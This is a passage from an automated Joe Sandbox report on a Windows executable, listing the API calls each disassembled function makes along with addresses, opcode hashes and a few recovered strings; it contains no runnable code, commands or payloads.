                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004717A3
                                                                                          • Part of subcall function 0047182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
                                                                                          • Part of subcall function 0047182D: InternetCloseHandle.WININET(00000000), ref: 004718E9
                                                                                        Similarity
                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1463438336-0
                                                                                        • Opcode ID: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                        • Instruction ID: 71b6e4b1fe2b952a6419c9952bf0f018ffc457c15b1f1ac8131077084853f328
                                                                                        • Opcode Fuzzy Hash: 0d77803af34525429c563aa5a91095bc3ad4b0cccef2d99c89baa2dfe7cd75a8
                                                                                        • Instruction Fuzzy Hash: 1121C235200601BFEB169F648C01FFBBBA9FF48710F10842FF91996660D775D815A7A9
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00435101
                                                                                          • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                                                                                          • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                                                                                          • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00CB0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                        • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                                                                                        • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                                                                                        • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004044CF
                                                                                          • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                                                                                          • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                                                                                          • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                        • Instruction ID: dcb2c65cf3c1a774e1d203f737fabc32089307ed9affa8f53aec521d9447171b
                                                                                        • Opcode Fuzzy Hash: 8233c1c53fe49e8a502b553c2e8f55af8437e20015ea4a24a99bc4102d4ad802
                                                                                        • Instruction Fuzzy Hash: 6F21FBB0904754AFE7328B249C45BEBBBEC9B55318F0404AFE79A56281C3782984CB49
                                                                                        APIs
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                                                                                          • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00476399
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004763A4
                                                                                        • _memmove.LIBCMT ref: 004763D1
                                                                                        • inet_ntoa.WSOCK32(?), ref: 004763DC
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 1504782959-0
                                                                                        • Opcode ID: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                        • Instruction ID: c304d0e6e06ed5b692ae79d4b0fe9c52f6c8e6d6f1456e813eafe14ad56adccd
                                                                                        • Opcode Fuzzy Hash: 762733e25637bc439446b3da9c5912462bd92284ca480afd830ba0cdb0608b85
                                                                                        • Instruction Fuzzy Hash: F2114F71600109AFCB00FBA5D946CEE77B9EF04314B54847AF505B72A2DB389E14CB69
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00458B61
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B73
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458B89
                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00458BA4
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                        • Instruction ID: 6d6e4feeaee75d02a1ec4dd614e497ad2765f264ac6e3ed00c825e9843e5ba14
                                                                                        • Opcode Fuzzy Hash: ca17c677d33199d8ade5de32726d6ec6320cad89c97852bedaa9fe676a546a7f
                                                                                        • Instruction Fuzzy Hash: 56113A79900218BFDB10DB95C884EAEBB78EB48710F2041A6E900B7250DA716E15DB94
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                        • GetClientRect.USER32(?,?), ref: 0043B5FB
                                                                                        • GetCursorPos.USER32(?), ref: 0043B605
                                                                                        • ScreenToClient.USER32(?,?), ref: 0043B610
                                                                                        Similarity
                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4127811313-0
                                                                                        • Opcode ID: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                        • Instruction ID: ee9d34d9398b5f91fab5137b757b2ab9dbcc007e8162b1c14587a54292e2d527
                                                                                        • Opcode Fuzzy Hash: 1c8f769d0dee53fb8c778101d630ad27ed939e462680dcfd79beede70ddeeb32
                                                                                        • Instruction Fuzzy Hash: 39112B39510059FBCB00EF99D8899AE77B8FB05300F4008AAF901F7291D734BA569BA9
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0045D84D
                                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0045D864
                                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0045D879
                                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0045D897
                                                                                        Similarity
                                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                                        • String ID:
                                                                                        • API String ID: 1352324309-0
                                                                                        • Opcode ID: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                        • Instruction ID: 3b05f8a101c890c8fbc83375acaac98503a8deaba450bce75694a4266b83033e
                                                                                        • Opcode Fuzzy Hash: f854c2ae4ddfb44975126c45fe272911be12f4fa913ee62eb5c826514f2548e5
                                                                                        • Instruction Fuzzy Hash: 48115E75A05304DBE330AF50EC08F97BBBCEF00B01F10896EA926D6151D7B4E94D9BA5
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                        • String ID:
                                                                                        • API String ID: 3016257755-0
                                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction ID: 3d94be51af7e819a6a5def82be0e086b27bd99855e7e965629bee2c507946819
                                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                        • Instruction Fuzzy Hash: 78014EB244414ABBCF2A5E84CC41CEE3F72BB1C354F599416FA9858131D23AD9B1AB85
                                                                                        APIs
                                                                                        • GetWindowRect.USER32(?,?), ref: 0048B2E4
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048B2FC
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048B320
                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048B33B
                                                                                        Similarity
                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 357397906-0
                                                                                        • Opcode ID: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                        • Instruction ID: e0f35f64d62337ec24ef524e52db7040af9c6cc02db1932b8591958b9ea84988
                                                                                        • Opcode Fuzzy Hash: e8173e98fc73e507b6a04d2f7e54522757b65c9b70d93ac78b94b59699abf8f9
                                                                                        • Instruction Fuzzy Hash: B9117775D00209EFDB01DF99C444AEEBBF5FF18310F104566E914E3220D735AA558F94
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00466BE6
                                                                                          • Part of subcall function 004676C4: _memset.LIBCMT ref: 004676F9
                                                                                        • _memmove.LIBCMT ref: 00466C09
                                                                                        • _memset.LIBCMT ref: 00466C16
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00466C26
                                                                                        Similarity
                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 48991266-0
                                                                                        • Opcode ID: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                        • Instruction ID: 06c116e41b1fbc97defe022da98efa456519ca017efd3746de7cd937a477406a
                                                                                        • Opcode Fuzzy Hash: edf19e1ede3b3e611382947217f22c9f8674c26c836af00265cbaa5f5bcd5e3d
                                                                                        • Instruction Fuzzy Hash: ACF0547A200110BBCF016F56EC85A8ABF29EF45325F4480A9FE085E227D775E811CBB9
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 00402231
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0040223B
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00402250
                                                                                        • GetStockObject.GDI32(00000005), ref: 00402258
                                                                                        • GetWindowDC.USER32(?,00000000), ref: 0043BE83
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0043BE90
                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0043BEA9
                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0043BEC2
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0043BEE2
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 0043BEED
                                                                                        Similarity
                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1946975507-0
                                                                                        • Opcode ID: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                        • Instruction ID: 54194c7dea5641a5760446fc0b471bd43188e270dcc7ade6c1867ff591c8ccba
                                                                                        • Opcode Fuzzy Hash: 1c24b0d26c008fe2912d49eeb423ba9ae618f885d5077ddc5dea034ec8dbd8ce
                                                                                        • Instruction Fuzzy Hash: 8FE03932104244EADB215FA8EC4D7D93B10EB05332F10837AFB69980E187B54994DB16
                                                                                        APIs
                                                                                        • GetCurrentThread.KERNEL32 ref: 0045871B
                                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458722
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,004582E6), ref: 0045872F
                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,004582E6), ref: 00458736
                                                                                        Similarity
                                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                                        • String ID:
                                                                                        • API String ID: 3974789173-0
                                                                                        • Opcode ID: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                        • Instruction ID: 27e516f12521b82670cd12e73380cd235ac9fe5f10b87aab6d4880cb8d6f589a
                                                                                        • Opcode Fuzzy Hash: c13fcb7cbc4fcf9024c8800305f1294cb96d5ee06e78be5c1b908a636c14961a
                                                                                        • Instruction Fuzzy Hash: 69E086366113119FD7205FB45D0CB5B3BACEF55792F244C3CB645D9051DA388449C754
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: %I
                                                                                        • API String ID: 0-63094095
                                                                                        • Opcode ID: 7d9f71a51cf9ccae10632cb1c333b25bb238ed028a66e8e460a60c47fc14a1ae
                                                                                        • Instruction ID: fc9b66e0bafda5900f64632d1c19c64e360ede111f7e08ffc6918f9b7723571d
                                                                                        • Opcode Fuzzy Hash: 7d9f71a51cf9ccae10632cb1c333b25bb238ed028a66e8e460a60c47fc14a1ae
                                                                                        • Instruction Fuzzy Hash: F7B19D759001099ACF24EF95C8819EEB7B5EF44314F11403BE942B72D1DB3C9AA6CB9E
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __itow_s
                                                                                        • String ID: xbL$xbL
                                                                                        • API String ID: 3653519197-3351732020
                                                                                        • Opcode ID: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                        • Instruction ID: dfe480003ad9fd5cab9b7df9ebde8448aad3da8901d64dd9d19fd2ed475b7079
                                                                                        • Opcode Fuzzy Hash: 90ba7ef9f8d9146918a72878262fd05d6879b866cf0277a0a7876aadaa269471
                                                                                        • Instruction Fuzzy Hash: DFB16E70A00105EFCB14DF55C890EEAB7B9EF58344F14C46AF949AB291EB38E941CB99
                                                                                        APIs
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • __wcsnicmp.LIBCMT ref: 0046B02D
                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0046B0F6
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                        • String ID: LPT
                                                                                        • API String ID: 3222508074-1350329615
                                                                                        • Opcode ID: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                        • Instruction ID: 83c5630e61c03cc96fa61f6b78faa4233f6e1162f12f5b466cba6b991e1c6364
                                                                                        • Opcode Fuzzy Hash: d30bb05f983bd9a15c5a3ce658688309f82e14a56a6b12c00daa3c40a9bd9b45
                                                                                        • Instruction Fuzzy Hash: EF617475A00215AFCB14DF54C851EEEB7B4EF09350F10806AF916EB391E738AE85CB99
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000), ref: 00412968
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00412981
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                        • String ID: @
                                                                                        • API String ID: 2783356886-2766056989
                                                                                        • Opcode ID: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                        • Instruction ID: a5a81f9d260a569e77baff687d6fe7a0f73e349ca0d117409dcb6840122a66be
                                                                                        • Opcode Fuzzy Hash: cf15a7ea090bffc9490279112080cc94ce2022ef9ba38fcf57aa55417a2360bc
                                                                                        • Instruction Fuzzy Hash: CB5159B24187449BD320EF15D885BAFBBE8FB85344F41886DF2D8911A1DB74892CCB5A
                                                                                        APIs
                                                                                          • Part of subcall function 00404F0B: __fread_nolock.LIBCMT ref: 00404F29
                                                                                        • _wcscmp.LIBCMT ref: 00469824
                                                                                        • _wcscmp.LIBCMT ref: 00469837
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID: DdL$DdL
                                                                                        • API String ID: 1473721057-91670653
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047259E
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 004725D4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |
                                                                                        • API String ID: 1413715105-2343686810
                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00486B17
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00486B53
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$DestroyMove
                                                                                        • String ID: static
                                                                                        • API String ID: 2139405536-2160076837
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462911
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0046294C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00486761
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0048676C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: Combobox
                                                                                        • API String ID: 3850602802-2096851135
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00486C71
                                                                                        • GetSysColor.USER32(00000012), ref: 00486C8B
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                        • String ID: static
                                                                                        • API String ID: 1983116058-2160076837
                                                                                        APIs
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 004869A2
                                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004869B1
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: LengthMessageSendTextWindow
                                                                                        • String ID: edit
                                                                                        • API String ID: 2978978980-2167791130
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00462A22
                                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: InfoItemMenu_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 2223754486-4108050209
                                                                                        APIs
                                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$OpenOption
                                                                                        • String ID: <local>
                                                                                        • API String ID: 942729171-4266983199
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        • _wcscat.LIBCMT ref: 00444CB7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: FullNamePath_memmove_wcscat
                                                                                        • String ID: SL
                                                                                        • API String ID: 257928180-181245872
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: __fread_nolock_memmove
                                                                                        • String ID: EA06
                                                                                        • API String ID: 1988441806-3962188686
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                          • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameSend_memmove
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 372448540-1403004172
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                          • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                          • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                          • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                        • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Variant$Init$ClearCopy_memmove
                                                                                        • String ID: d}K
                                                                                        • API String ID: 2932060187-3405784397
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: ClassName_wcscmp
                                                                                        • String ID: #32770
                                                                                        • API String ID: 2292705959-463685578
                                                                                        APIs
                                                                                          • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                          • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                        Strings
                                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                        • API String ID: 3158253471-631824599
                                                                                        • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                        • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                        • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                        • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9